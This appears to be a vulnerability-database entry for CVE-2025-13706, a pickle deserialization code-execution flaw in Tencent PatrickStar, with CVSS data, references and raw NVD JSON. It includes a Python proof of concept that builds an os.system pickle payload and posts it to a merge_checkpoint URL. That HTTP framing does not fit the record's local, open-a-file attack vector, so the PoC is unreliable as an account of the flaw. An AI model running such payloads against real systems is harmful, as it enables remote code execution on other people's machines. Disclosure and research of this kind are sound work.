Security Vulnerability Report
CVE-2025-13706 CVSS 7.8 HIGH

CVE-2025-13706

Published: 2025-12-23 22:15:45
Last Modified: 2026-04-15 00:35:42

Description

Tencent PatrickStar merge_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent PatrickStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the merge_checkpoint endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27182.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Tencent PatrickStar < fixed version
Tencent PatrickStar versions prior to commit 2384535503ea98cfe35ad04e20c0cfc7bf58d5d7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13706 PoC - Tencent PatrickStar merge_checkpoint Deserialization RCE
# This PoC demonstrates the deserialization vulnerability in merge_checkpoint endpoint
import os
import pickle
import requests
import sys


# Malicious pickle payload that executes arbitrary command during deserialization
class MaliciousPayload:
    def __reduce__(self):
        # Replace 'id' with actual command to execute
        cmd = "id"
        return (os.system, (cmd,))


def generate_exploit_payload():
    """Generate malicious serialized payload"""
    payload = pickle.dumps(MaliciousPayload())
    return payload


def exploit_merge_checkpoint(target_url, payload):
    """Send malicious payload to merge_checkpoint endpoint"""
    endpoint = f"{target_url}/merge_checkpoint"
    headers = {
        'Content-Type': 'application/octet-stream',
        'User-Agent': 'Mozilla/5.0'
    }
    try:
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} http://target:8080")
        sys.exit(1)

    target = sys.argv[1]
    print("[*] Generating malicious payload for CVE-2025-13706...")
    payload = generate_exploit_payload()
    print(f"[*] Sending payload to {target}/merge_checkpoint...")
    response = exploit_merge_checkpoint(target, payload)
    if response:
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text[:500]}")

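References

https://github.com/Tencent/PatrickStar/commit/2384535503ea98cfe35ad04e20c0cfc7bf58d5d7
https://www.zerodayinitiative.com/advisories/ZDI-25-1034/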

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13706", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:45.190", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tencent PatrickStar merge_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent PatrickStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the merge_checkpoint endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27182."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/Tencent/PatrickStar/commit/2384535503ea98cfe35ad04e20c0cfc7bf58d5d7", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1034/", "source": "[email protected]"}]}}